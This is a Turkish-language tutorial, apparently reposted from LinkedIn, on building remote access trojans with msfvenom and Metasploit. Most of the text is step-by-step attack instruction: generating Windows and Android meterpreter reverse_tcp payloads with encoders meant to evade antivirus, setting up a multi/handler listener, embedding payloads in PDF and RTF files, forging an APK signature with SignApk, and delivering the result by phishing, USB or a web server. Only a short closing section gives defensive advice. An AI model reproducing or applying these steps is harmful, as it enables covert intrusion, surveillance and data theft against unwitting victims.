MSFVENOM KULLANARAK RAT OLUŞTURMA

Uzaktan Erişim Truva Atları ( Remote Access Trojans ) ; Gizli gözetime izin verme veya kurban bilgisayara yetkisiz erişim sağlama özelliği sağlayan programlardır. Uzaktan Erişim Truva Atları , tuş vuruşlarının , kullanıcı adlarının , şifrelerin , ekran görüntülerinin , tarayıcı geçmişlerinin , e-postaların , sohbet loglarının vb. otomatik olarak toplanmasına izin vererek genelde tuş kaydedici uygulamalarının davranışlarını taklit eder. RAT'ler ağlara büyük zarar verebilir. Belirli hedeflere saldıran birkaç iyi bilinen RAT vardır. KjW0rm RAT’ı , TV istasyonlarına yapılan birkaç saldırıdan sorumlu tutulurken , Havex ise RAT endüstriyel kontrol sistemlerine ( ICS ) saldırır. AlienSpy , Apple OS'ye saldırmak için tasarlanmıştır. Çoğu RAT , komut ve kontrol sunucusuyla çalışacak şekilde tasarlanmıştır. C&C sunucusu , bilgisayar korsanları tarafından virüslü cihazlar veya botlarla uzaktan iletişim kurmak için kullanılır. Saldırgan , komutlar göndererek botlardan toplanan verileri alarak bunları DDoS saldırıları gerçekleştirmek için kullanabilir. Bot gruplarına ( uzaktan kontrol edilen virüslü cihazlar ) botnet denir. Bilgisayar korsanlarının büyük botnetler oluşturup diğer bilgisayar korsanlarına kiralaması yaygın bir uygulamadır. Nesnelerin İnterneti'nin ( IoT ) yükselişi nedeniyle , bilgisayar korsanlarının karanlık pazarlar aracılığıyla botnet oluşturup satması son derece kolay hale geldi. Bilgisayar korsanları genelde kötü amaçlı yükler oluşturarak e-posta bağlantısı olarak gizlemektedir. Sahte e-posta bağlantıları , RAT'lerin bilgisayar korsanları tarafından kullanılmasının en yaygın yolu olabilir fakat tek yolu elbette değildir. RAT'ler , .exe dosyalarında gizlenip amacı gizlemek için özgeçmiş gibi dosya olarak USB'ye yerleştirilebilir. Bilgisayar korsanı , ofisteki yazdırma yetkisi olan bir kullanıcıdan özgeçmiş adlı sahte dosyayı yazdırmasını isteyebilir fakat açtığında , yük etkinleştirilir. Yük etkinleştirildikten sonra , bilgisayar korsanı ağın güvenliğini tehlikeye atarak kalıcı erişim için arka kapılar kurabilir. RAT'leri kullanmanın başka bir yolu da onları sahte web sayfası düğmelerinde gizlemektir. Ücretsiz Wi-Fi konumuna giriş yaptığınızda , şartları ve sözleşmeleri kabul ettiğinizde yük , Kabul ediyorum düğmesinde gizlenebilir. Bilgisayar korsanı , resim veya video ekinde RAT'ı da gizleyebilir. RAT , bir simge içinde de gizlenebilir. Bilgisayar korsanlarının kullandığı popüler bir enfeksiyon yöntemi torrentlerdir. Birçok bilgisayar korsanı , popüler bir filmde veya şarkıda RAT saklayarak ücretsiz indirmek için bir torrent'e gönderir. Kurban , virüslü dosyayı indirip açtığında , kurbanın cihazı bilgisayar korsanına seslenecektir. RAT'ler çoğunlukla daha karmaşık saldırı aşamaları oluşturmak için kullanılır. RAT , ilk erişime izin verir. Bilgisayar korsanı kurbanına eriştiğinde , bilgisayar korsanı kurbanın cihazına arka kapılar kurmaya başlar. RAT'ın oluşturduğu oturumu korumak için yapılır. Arka kapı kurulmadıkça , RAT'ın kurduğu oturum , kurbanın cihazı yeniden başlatıldığında sona erecektir. Arka kapı her zaman gerekli değildir. Bazı bilgisayar korsanları ayak izlerini farkettirmek konusunda çok daha hassas olabilirler. Bilgisayar korsanı uygun keşif yaptıysa , hedefe ne zaman saldıracağını bilecektir. Bir kurbanın cihazında RAT etkinleştirildiğinde , bilgisayar korsanı kurbanın cihazında bulunan herhangi bir dosyayı hızla indirebilir veya yükleyebilir. Bilgisayar korsanı kurbanın ağında ne kadar az zaman geçirirse , keşfedilme olasılıkları o kadar az olur. Bazı bilgisayar korsanları , RAT'leri arka kapı gerektiren botnet'ler oluşturmak için kullanmak yerine daha fazla saldırı için kullanacaktır. RAT'lerde bulunan daha yaygın yüklerden biri de ters TCP yüküdür. Bu yük , bilgisayar korsanının kurbanın cihazındaki komut terminalinin kontrolünü ele geçirmesine izin veren ters TCP bağlantısı kurar. Bilgisayar korsanı , kurbanın makinesindeki komut terminaline eriştiğinde , saldırıyı geliştirmek için çeşitli kötü amaçlı seçenekler seçebilir. Bilgisayar korsanının amacına bağlı olarak , tüm dizinleri veya tek dosyaları indirebilirler. Ayrıca istedikleri dosyayı da yükleyebilirler. Bilgisayar korsanı , daha yıkıcı saldırı için kolayca ek yükler ( kripto virüsü gibi ) yükleyebilir. Herhangi bir siber güvenlik uzmanının RAT'lerin nasıl çalıştığına dair temel bilgiye sahip olması önemlidir. RAT'ler birçok şekilde teslim edilir. RAT'ın kullanabileceği farklı saldırı vektörlerinin farkında olmak , daha iyi bir ağ savunması oluşturmaya yardımcı olacaktır. Msfvenom , oldukça etkili kaçınma yöntemleri kullanır. /S binary dosyası , potansiyel olarak farklı PE/COFF çıktı biçimlerinden yararlanmanın yanı sıra kaçınma için fırsatlar sunar. msfvenom yüksek düzeyde desteklenerek en son kaçınma yöntemleriyle rutin olarak güncellenir.

Msfvenom kullanarak Uzaktan Erişim Truva Atı oluşturma ; Sözdizimine aşina olmak için Yardım seçeneklerine göz atmak için mevcut seçenekleri görüntülemek için terminalinizi açıp ( CTRL + ALT + T ) ve sonrasında msfvenom -h yazınız. -l komutu , kapsamlı bir yük , kodlayıcı ve diğer seçenekler listesine erişim sağlayacaktır.

İstismar ( Exploit ) ; Saldırganın bir sistem , uygulama veya hizmetteki bir kusurdan nasıl yararlandığıdır. Yük ( Payload ) ; Yük , uzak sistemin yürütmesini istediğimiz kötü amaçlı koddur. Kabuk kodu ; İstismar gerçekleştiğinde yük olarak kullanılan bir dizi talimattır. Modüller ; İstismarlarımızı başlatabilen , uzak sistemleri tarayabilen ve uzak sistemi numaralandırabilen yazılım paketleridir. Dinleyici ( Listener – LHOST ) ; Uzak sistemden yararlanıldıktan sonra herhangi bir türde gelen bağlantı için bekleyen Metasploit'teki bileşendir. Host bilgisayar IP adresiniz olacaktır. Alıcı ( Receiver – RHOST ) ; Alıcı , sistemden yararlanıldıktan sonra LHOST'tan talimat bekleyen güvenliği ihlal edilmiş sistemdir. Hedefin IP adresi olacaktır.

Msfvenom ; msfpayload ve msfencode'un birleşimi olup onu tek çerçeve yapar. Büyük etki için kullanılabilecek güçlü bir araçtır. Yükünüzü seçerken , hedefiniz hakkında mümkün olduğunca fazla bilgiye sahip olmanız önemlidir. Hedefiniz Windows işletim sistemi çalıştırıyorsa , aramaları daha verimli hale getirmek için Mac ve Linux yüklerini filtreleyebilirsiniz. Yükünüzü seçtiğinizde , birkaç seçenek belirlemelisiniz. İlk seçenek , yükün adı olacaktır.

Faydalı yük pencereleri /meterpreter/reverse_tcp'yi seçelim. İkinci seçenek ise kullanacağımız modülü ayarlamamızı gerektirecektir. Yükü inşa ettiğimiz için payload modülünü kullanalım. Ardından , saldırmak istediğimiz platformu seçelim. İlk olarak , dinleme host bilgisayar IP'sini , bağlantı noktası numarasını, hedefin sistem mimarisini , hedefin işletim sistemini , çıkış tekniğini ayarlamak gibi çeşitli görevlerden oluşan ( önceden geliştirilmiş ) yük kullanarak yürütülebilir kabuk kodu oluşturalım. Birçok bilgisayar korsanı , izlerini örtmek için temizleme komut dosyaları kullanır.

Temizleme komut dosyası , bilgisayar korsanının orada olduğunu gösterebilecek tüm izleri silmektedir. Handler / listener kurup çalıştırınız. Kabul Kodunu ( shellcode ) çalıştırınız. Meterpreter ile belirli görevleri / saldırıları gerçekleştiriniz.

Sonraki yapmamız gereken adım ise LHOST ve LPORT'u kurmaktır. LHOST ( yerel host bilgisayar ) , RAT etkinleştirildiğinde kurbanın cihazının arayacağı dinleyen host bilgisayardır. LHOST'u ayarlamak için IP adresimizi bulmamız gerekiyor. IP adresinizi onaylamak için ifconfig yazınız. IP adresim 192.168.2.20 , bu yüzden LHOST'u bu IP'ye ayarladım. LHOST ayarlandıktan sonra LPORT'u ayarlamam gerekiyor. LPORT ( yerel bağlantı noktası ) , ters TCP oturumunun kurulacağı dinleme bağlantı noktasıdır. LPORT'u 5555 numaralı bağlantı noktasına ayarlayalım. LPORT'u ayarlayarak , istismar etkinleştirilirse kurbandan bağlantıyı 5555 numaralı bağlantı noktasından alacağız. Bu adımın en önemli kısmı , LHOST için doğru IP'yi almaktır. LHOST'u kurbanın cihazına değil , saldıran cihazınıza ayarladığımızdan emin olalım. LPORT , istediğiniz herhangi bir şey olabilir. RAT'ın yükü etkinleştirildiğinde , kurbanın cihazı , LHOST'un ayarlandığı IP'yi arayacaktır. Daha gelişmiş bilgisayar korsanları LHOST'u , komuta ve kontrol sunucusunun IP'sine ayarlamaktadır. Komuta ve kontrol sunucusunun temel amacı , komutlar gönderip RAT bulaşmış cihazlardan ( zombi makineleri ) veri almaktır. Çoğu botnet bu şekilde yönetilir. RAT'ler hem büyük hem de küçük işlemler için kullanılabilir.

Payload sözdizimi ; Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5-b'\x00' LHOST=192.168.2.20 LPORT=5555 -f exe > kinguser.exe

Bu komut ile Windows işletim sisteminden yararlanmak için yük oluşturacaktır. Bu yük etkinleştirildiğinde , ters TCP bağlantısı kurup belirtilen LPORT'ta oturum oluşturacaktır. Komutun meterpreter/reverse_tcp kısmı yükü belirtir. -e x86/shikata_ga_nai , antivirüs korumasından kaçmak için kullanacağımız kodlayıcı türünü belirtir. Shikakta_ga_nai en çok Windows 7'ye karşı etkilidir. Komutun sonraki kısmı olan -i 5-b '\x00' , izinsiz giriş tespit sistemine onu açığa çıkarabilecek kötü karakterleri yükten kaldırır. Birçok veri yükü , dosya imzaları veya onaltılık imzalarıyla algılanır. Sıfır gün açıklarının bu kadar etkili olmasının nedeni , onaltılık imzalarının ortamda kullanılmadan herhangi IDS veritabanına kaydedilmemesidir. Virüsten koruma programı , sadece bilinen en son kötü amaçlı dosya veya onaltılık imzalarla düzenli olarak güncellenirse etkilidir. Öyle olsa bile iyi bir sıfır gün yükü , herhangi bir virüsten koruma programını işe yaramaz hale getirecektir. LHOST=192.168.2.20 komutu , yerel host bilgisayarı dinleyici olarak ayarlar. RAT etkinleştirildiğinde , virüslü cihaz LHOST için ayarlanmış IP'yi arayacaktır. LPORT=5555 komutu , virüslü cihaza , oturumun hangi portta kurulacağını söyler. Komutun -f exe > kısmı ise yükünüzün gizlenmesini istediğiniz dosya uzantısı türünü belirtir. .exe olması gerekmez. Sosyal mühendislik araç takımı ( SET ) gibi araçlar , bilgisayar korsanları tarafından yüklerini şüphelenmeyen kurbanlara teslim etmek için kullanılır. Sosyal mühendislik araç takımları , bilgisayar korsanlarının saldırılarının etkinliğini artırmasını sağlar. Birçok bilgisayar korsanı , kimlik avı e-posta görevlerinde kullanılmak üzere RAT'ler oluşturur. SET gibi araç seti , kimlik avı görevleri oluşturmak için mükemmeldir fakat aynı zamanda birden fazla saldırı vektörüne de izin verir. Yürütülebilir dosyanızı kurban cihaza göndermek için izlenecek adımlar ; Places > Home klasörüne gidip , usr | share | set kısmında kinguser.exe'ye sağ tıklayıp özellikler kısmında İzinler Sekmesine gidiniz. Onay işaretine tıklayarak dosyanın program olarak yürütülmesini sağlayınız. USB , e-posta veya başka bir yöntemi kullanarak hedef bilgisayara aktarınız. Hedef .exe dosyasını çalıştırdığında , meterpreter oturumu açılacaktır. Sonraki adım , dinleyiciyi çoklu / işleyici kullanarak saldırgan cihazımızda kurmaktır. Çoklu / işleyici modülünü kullanmak için msfconsole'a erişmeliyiz. Terminal açıp msfconsole yazınız.

meterpreter reverse_tcp yükünü kullanmak için kurmamız gerekmektedir. Çoklu/işleyici komutları için bazı bilgiler ; exploit/multi/handler kullanma ; Bu komut gelen bağlantıları yönetir. Set payload windows/meterpreter/reverse_tcp ; Kullanılacak yüktür. Show options ; Ayarlanacak mevcut seçenekleri gösterir. LHOST ve LPORT'u kurup yükü oluştururken kurduğunuzla aynı olduklarından emin olmamız gerekmektedir.

Saldıran cihaz için daha önce kurduğunuz doğru IP ve bağlantı noktasını kullanmanız önemlidir. Çoklu işleyicinin temel amacı , saldırganın cihazı ile kurbanın cihazı arasındaki iletişimi kolaylaştırmaktır. Çoklu işleyici , saldırgan ile birden çok kurban arasındaki birden çok oturumu yönetmek için de kullanılır. Yüklü kinguser.exe dosyasını mümkün olan en iyi şekilde kurbanın bilgisayarına aktardığınızdan emin olunuz. Birçok bilgisayar korsanı , sosyal olarak tasarlanmış e-posta oluşturarak yükü bir bağlantıda gizleyecektir. Akabinde , dinleyici veya saldırgan makinede çalıştır veya istismar yazıp oturum başlatınız. Ardından kurban cihazındaki yükü dosyaya çift yıklayarak etkinleştiriniz. Çoklu işleyici modülü kullanılarak bulunan bazı yaygın seçenekler şöyledir ; Check ; Hedefin saldırıya açık olup olmadığını belirlemektedir. Exploit ; Modülü çalıştırır veya istismar ederek hedefe saldırmaktadır. exploit –j ; Yararlanmayı iş bağlamında çalıştırmaktadır. exploit –z ; Başarılı kullanımdan sonra oturumla etkileşime girmez. exploit -e ; Kullanılacak yük kodlayıcısını belirtir. exploit –h ; Exploit komutu için yardımı görüntülemektedir. Birden fazla veya daha fazla karmaşık seçenek için şu komutlardan ve özelliklerden herhangi birini de kullanabiliriz ; -A ; Aracıya bağlanmak için eşleşen çoklu / işleyiciyi otomatik olarak başlatma. -U ; Kullanıcı oturum açtığında aracıyı otomatik olarak başlatma. -X ; Sistem önyüklendiğinde aracıyı otomatik olarak başlatma. -i ; Her bağlantı girişimi arasındaki saniye cinsinden aralıktır. -p ; Uzak host bilgisayardaki Metasploit'in dinlediği bağlantı noktasıdır. -r ; Metasploit çalıştırıp dönüş bağlantısını dinleyen sistemin IP'sidir. Kullanılabilir oturumları listelemek için şunu giriniz ; sessions -i Kullanılabilir tüm oturumları listeleyip sistemden yararlanılırken hangi güvenlik açığının kullanıldığı gibi ayrıntılı alanları göstermek için şu komutu giriniz ; sessions –i -v Tüm Meterpreter canlı oturumlarında belirli bir meterpreter komut dosyasını çalıştırmak için şu komutu giriniz ; session -s script Tüm canlı oturumları kapatmak için şu komutu giriniz ; sessions -k Tüm canlı Meterpreter oturumlarında komut yürütmek için ; sessions –c cmd Mevcut seçenekleri görmek için terminalde Type? Yazabilirsiniz. Kurban PC'den bilgi alabileceğinizden emin olmak için sysinfo yazabilirsiniz. Metasploit ile RAT'ınızı gizlemenin yolları ; RAT'ınızı tıklamaları için sosyal mühendis kullanıcılarına yükünüzle bir PDF dosyası veya MS Word belgesi bağlayabilirsiniz. Bu nedenle , güvenilir bir kaynaktan geldiğini onaylamadığınız sürece e-postanızdaki rastgele dosyaya asla tıklamamalısınız. Dikkat etmeniz gereken bazı oltalama taktikleri , indirmeniz ve çalıştırmanız gereken dosyaları içeren e-postalardır. Size programın PDF'si veya ekli sözleşme ile iş teklif ediyormuş gibi davranan sahte işverenler olabilirler. Saldırganın sisteminize girmesinin en etkili yollarından biri olduğu için bu kimlik avı dolandırıcılığına karşı

PDF gömülü RAT ; Şu komut satırları sayesinde , arka kapı bağlantısının masum görünümlü PDF'ye yerleştirilebiliriz ; msf > search type:exploit platform:windows adobe pdf msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf > exploit (adobe_pdf_embedded_exe) > info msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp msf > exploit (adobe_pdf_embedded_exe) > show options msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME clickmestupid.pdf msf > exploit (adobe_pdf_embedded_exe) > set FILENAME clickmestupid.pdf msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.20.1 msf > exploit (adobe_pdf_embedded_exe) > show options msf > exploit (adobe_pdf_embedded_exe) > exploit MS Word gömülü RAT ; Şu komut satırları , dinleyiciyi kurbanın bilgisayarına gömmek için MS Word'den nasıl yararlanılacağını göstermektedir ; msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit( ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp msf >show options msf >set FILENAME clickmestupid.rtf msf> set LHOST 192.168.20.10 msf > exploit Android RAT ; RAT oluşturup sahte uygulama içinde saklayabiliriz. Bu istismar Android telefonlar için tasarlanmıştır. Bu yükü oluşturmak için msfvenom kullanacağız. Sahte uygulama açıldığında , bilgisayar korsanının kurbanın telefonuna uzaktan erişimi olacaktır. Bilgisayar korsanının kontrolü ele geçirdiğinde , kamerayı açabilir , tüm metin mesajlarını atabilir , tüm arama günlüklerini boşaltabilir , kurbanın telefonunun coğrafi konumunu elde edip mikrofonu açıp kaydetmeye başlayabilir , daha fazlasını da yapabilir. Bilgisayar korsanları , Playstore'da bulunan güvenlik eksikliğinden yararlanır. Bunu Apple Playstore'da yapmak imkansız olmasa da çok daha zor. Bu hack'in işe yaramasının anahtarı ise sahte uygulamanın meşru görünmesini sağlayan dijital sertifikaların sahteciliğidir. Kullanacağımız dijital sertifika aracının adı SignApk. SignApk aracı , bilgisayar korsanının dijital sertifika oluşturmasına olanak tanıyarak sahte uygulama indirildikten sonra kurbanın Android cihazına aktarılabilir. SignApk , apk dosyasını otomatik olarak imzalamak için Android test anahtarı kullanır. SignApk paketini indirdiğinizde özel ve genel anahtarlar .jar dosyasında bulunacaktır. Bunun gibi bir yükü telefona aktarmanın birçok yolu vardır. Yaygın yol ise sahte uygulamayı rutin ve zararsız bir şey olarak gizlenmiş e-posta bağlantısıyla göndermektir. Bilgisayar korsanı , kısa mesaj yoluyla da gönderebilir. 2016'dan sonra yapılan telefonlarda bunu yapmak daha zor olsa da , yine de mümkündür. Bilgisayar korsanı , kötü niyetli metnin güvenilir kaynaktan geldiğini göstermek için numaralarını bile taklit edebilir. Uygulama mağazasından uygulama indirirken dikkatli olmak önemlidir. İndirmeden önce diğer kullanıcıların yorumlarını okuyup uygulama hakkında biraz araştırma yapmalısınız. İlk adım olarak SignApk'ı GitHub'dan indirelim. Sonrasında daha kolay erişim için masaüstüne taşıyalım. Terminal açıp msfvenom -p Android/meterpreter/reverse_tcp LHOST=192.168.20.15 LPORT=8888 R > /root/Desktop/androidrat.apk yazalım. Payload oluşturulduktan sonra SignApk ile dijital sertifikayı oluşturalım. Az önce oluşturduğumuz yükü sürükleyip masaüstünüzdeki SignApk klasörüne bırakın. Sertifikayı taklit etmek için dizinleri değiştirmemiz gerekiyor. cd/root/Desktop/SignApk'yi yazın. Bunu yaptıktan sonra , klasörde bulunan dosyaların listesi için ls dizin türünü değiştiriniz. SignApk klasöründe gördüğünüz dosyalar , dijital sertifikayı oluşturup yükün meşru Android uygulaması gibi görünmesini sağlayacak araçlardır. SignApk dizinine girdikten sonra java -jar signapk.jar Certificate.pem key.pk8 androidrat.apk test.apk yazınız. Sırada bu sahte uygulamayı uygulama mağazasına koymak yerine , yerel Apache sunucusu üzerinden gönderip kurban simülasyonu indirelim. Bunu yapabilmek için yeni oluşturulan apk dosyasını ( test.apk ) var>www>HTML klasörümüze sürüklememiz gerekecektir. Sahte apk dosyası HTML klasörüne girdikten sonra terminal açıp service Apache2 start yazın. Böylelikle sunucuyu yeniden başlatıp sahte apk dosyasını indirmeye hazır hale getirecektir. Bu yapıldıktan sonra , çoklu işleyiciyi kurmanız gerekecektir. Terminal açıp msfconsole yazıp çoklu işleyici modülünü getirmek için use exploit/multi/handler yazınız. Çoklu işleyiciye girdikten sonra , yükü msfvenom -p Android/meterpreter/reverse_tcp olarak ayarlayın, ardından LHOST'u 192.168.20.15 ve ardından LPORT'u 8888 olarak ayarlayarak run yazınız. Kurbanın cihazında tarayıcı açıp saldırganın IP'sini ve apk dosyasının adını yazınız. Bu durumda 192.168.50.15/test.apk olacaktır. Kurban bunu yazdıktan sonra , Android uygulamasını indirmek için izin isteyen indirme penceresi açılacaktır. Kurban bu izni verdikten sonra apk dosyası indirilerek açılmaya hazır hale gelecektir. Açıldığında , sahte uygulama saldırganla oturum kuracaktır. Başarılı olursa , saldırgana saldırı seçenekleri için menü gösterilecektir.

Savunma ; Günümüzde , Truva atları , hileli bir web sitesini ziyaret ettiğinizde programın arka planda indirildiği tarayıcı geçişleri tarafından yayılabilir. Kabuk kodu , çeşitli arka kapılar , botlar , casus yazılımlar ve diğer Truva atı programları aracılığıyla HTTP üzerinden ek yük kodu indiren Truva Atı çalıştırabilir. Kimlik avı e-postaları , kullanıcıları virüslü web sitelerini ziyaret etmeleri , kötü niyetli bağlantılara tıklamaları ( yükü etkinleştirerek ) veya hasat için kimlik bilgilerini girmeleri için manipüle etmek için kullanılır.

Siyah şapkalı bilgisayar korsanları ayrıca sitelerdeki güvenlik zayıflıklarından yararlanarak Truva atlarını güvenen tüketiciler tarafından indirilecek meşru yazılımlara geri yükleyebilir. Siber suçlular , kimlikleri çalmak ve dolandırıcılık yapmak için yeni yöntemler geliştirmeyi asla bırakmazlar. Tüketicilerin kendilerini siber suç kurbanı olmaktan korumak için atabilecekleri adımlar vardır.

Bu adımlar , web'de bulunan çoğu saldırı yöntemini filtrelemeye yardımcı olacak ve güvenliğinizin ihlal edilmesini önleyecektir. Mobil cihazınızda güvenliği kullanalım. RAT'ler , e-posta eki , dosya veya internetten indirilen program olarak gelebilir veya masaüstünden diğer verilerle birlikte karşıya yüklenebilir. Verileri düzenli olarak yedeklediğinizden emin olunuz. Harici bir sürücüde veya güvendiğiniz bir yerde saklayınız. Bir saldırıya uğrarsanız , en azından fotoğraflarınızı , müziklerinizi , filmlerinizi ve kişisel bilgilerinizi kurtarabilirsiniz. Bilgisayarınızı güçlü güvenlik yazılımları ile koruyup güncel tuttuğunuzdan emin olunuz.

Web'deki çoğu saldırıya karşı koruma sağlamada etkili olan çok sayıda antivirüs , casus yazılım önleme , güvenlik duvarı , istenmeyen posta önleme ve kimlik avı önleme seçenekleri vardır. Güvenlik yazılımı araçlarının ücretsiz ve ücretli sürümleri mevcuttur. Güçlü antispam ve kimlik avı önleme prosedürlerini uygulayan , güvenilir İnternet servis sağlayıcısı ( ISS ) seçiniz. Bazıları yedekleme desteği bile sağlayabilir.

Otomatik Windows güncellemelerini etkinleştirip diğer yazılım üreticilerinin yamalarını dağıtılır dağıtılmaz yükleyiniz.

Güvenlik duvarının arkasındaki tamamen yama uygulanmış bir bilgisayar , Truva atı ve casus yazılım kurulumuna karşı en iyi savunmadır.

Ekleri açarken dikkatli olunuz. Virüsten koruma yazılımınızı , tüm e-posta ve anlık ileti eklerini otomatik olarak tarayacak şekilde yapılandırınız. E-posta programınızın ekleri otomatik olarak açmadığından ve önizleme bölmesinin kapalı olduğundan emin olunuz. Tanımıyor olabileceğiniz kişilerden bile beklemediğiniz istenmeyen iş e-postalarını veya eklerini asla açmayınız. Eşler arası ( P2P ) dosya paylaşımında dikkatli olunuz. Truva atları , indirilmeyi bekleyen dosya paylaşım programlarına bağlı olabilir.

E-posta ve IM iletişiminde kullandığınız paylaşılan dosyaları indirirken dikkatli olunuz. .exe, .scr , .ink , .bat , .vbs , .dll , .bin , .cmd uzantılı dosyalardan kaçınınız. Tam olarak güncellendiğinden ve Truva atları yükleyebilecek kimlik avı sitelerini belirlemek ve filtrelemek için en son teknolojileri kullandığından emin olmak için tarayıcınızı güncelleyiniz. IM uygulamanızı yapılandırınız. Bilgisayarınızı başlatırken otomatik olarak başlamadığından emin olunuz. Kullanmadığınız zamanlarda bilgisayarınızı kapatarak modem hattının bağlantısını kesiniz. En yaygın olarak spam'ınızda bulunan kimlik avı planlarına karşı dikkatli olunuz. Web sitesinin meşru olduğundan emin olunuz.

WHOIS arama motorunu kullanarak web sitelerinin geçerliliğini adreslerinden ( URL'ler ) kontrol edebilirsiniz. ( 1 )

ALINTIDIR (linkedn /Serkan YALÇIN)

Last updated